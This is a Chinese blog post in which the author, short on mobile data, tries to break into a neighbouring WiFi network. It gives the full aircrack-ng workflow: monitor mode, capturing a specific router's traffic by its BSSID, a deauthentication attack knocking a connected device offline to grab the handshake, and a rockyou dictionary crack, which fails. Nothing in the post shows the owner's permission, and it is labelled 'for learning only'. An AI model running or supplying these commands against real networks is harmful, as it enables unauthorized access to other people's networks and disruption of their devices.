原文链接: 1、前言:我刚搬到一个新地方,还没有安装WIFI,手机流量快用完了。我看到附近有WIFI信号,心动了一下。于是我上网搜索了一下教程,进行了一次试验。我将试验过程和结果记录下来,仅供学习参考。
2、实验环境:
3、实验过程:
一、无线网卡安装
1.我将无线网卡插入主机的USB接口,Kali虚拟机弹出窗口提示我选择连接到虚拟机,我选择了Kali并点击确定。(有些教程说需要安装驱动程序,这可能取决于所购买的无线网卡是否免驱。我的无线网卡是免驱动的,所以直接插入即可使用。)
2.1.现在在Kali的网络连接中,我可以看到虚拟机可以搜索到附近的WIFI信号,这表明无线网卡安装成功。
2.2.我打开终端,输入ifconfig命令查看网卡信息,发现有wlan0。这也说明无线网卡安装成功。
2.3.我在终端输入iwconfig命令,发现有wlan0网卡,这也说明无线网卡安装成功。
2.4.我在虚拟机中检查可移动设备,可以清楚地看到无线网卡的型号。这也证明无线网卡安装成功。
二、握手包抓取
1.1.我输入命令清除系统中可能影响监听的进程:airmon-ng check kill
1.2.我开启网卡监听:airmon-ng start wlan0
1.3.我检查是否成功开启监听(可以看到wlan0变成了wlan0mon,说明成功开启监听模式):iwconfig
2.开始探测附近的WIFI信号:airodump-ng wlan0mon
主要关注三个参数:
3.我选择一个信号比较强的WIFI进行监听,我选择了一个小米的WIFI,BSSID为:64:64:4A:E3:90:41,使用的信道为1。我输入命令开始监听:airodump-ng –bssid 64:64:4A:E3:90:41 -c 1 -w test wlan0mon
参数说明:
下图说明:BSSID是路由器的MAC地址,STATION是当前连接在路由器上的设备的MAC地址
4.我另外打开一个终端,对当前正在连接的某个设备进行攻击,使其与路由器断开连接。(原理没有深究,大概是向目标设备发送大量数据,或者类似于ARP欺骗的攻击,使设备与路由器断开连接。停止攻击后,设备会自动重新连接上路由器,此时就可以抓取到握手包。)我使用了以下命令:
aireplay-ng -0 10 -a 64:64:4A:E3:90:41 -c C:2E:A1:9F:9E:2F wlan0mon
或者
aireplay-ng –deauth 10 -a 64:64:4A:E3:90:41 -c C:2E:A1:9F:9E:2F wlan0mon
参数说明:
5.等待攻击完成,此时在第一个终端会显示握手包抓取成功,如下图所示:
6.在根目录生成了一些握手包文件,其中包含test-01.cap文件。
三、爆破密码
1.我在终端输入命令:aircrack-ng -w /usr/share/wordlists/rockyou.txt test-01.cap
参数说明:
PS:一开始我使用这个命令时报错,缺少-w参数。然后我进入密码存放文件路径,发现自带的密码是一个压缩包,需要先解压才能使用。源文件名为:rockyou.txt.gz。另外,如果一开始更改了存放位置,需要加上完整的路径。
4、实验结果:
等待爆破结束(很遗憾,密码字典不够强大,没有破解成功。如果密码正确,会在终端显示出来)。
5、个人总结:
我感觉这次实验学到了一个工具的基本使用过程。aircrack-ng的原理是使用CPU来处理数据包,全程不需要联网,破解速度取决于个人CPU的性能。
我还看到了一个利用显卡GPU来处理字典的教程,原理与之类似。首先抓取握手包,然后使用hashcat工具进行破解。据说速度比aircrack-ng快得多。还有其他一些类似的工具,如EWSA(与hashcat原理类似)。
我也尝试了一下,但是hashcat没有成功运行,原因是我的电脑只有集成显卡,性能太差。需要有独立显卡才能运行。